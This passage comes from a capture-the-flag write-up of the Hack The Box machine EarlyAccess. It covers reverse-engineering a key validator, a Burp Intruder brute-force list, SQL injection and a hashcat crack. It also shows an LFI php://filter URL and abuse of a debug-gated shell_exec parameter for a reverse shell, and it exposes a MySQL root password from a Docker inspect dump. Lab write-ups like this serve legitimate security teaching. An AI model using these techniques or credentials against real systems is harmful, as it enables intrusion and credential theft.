          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
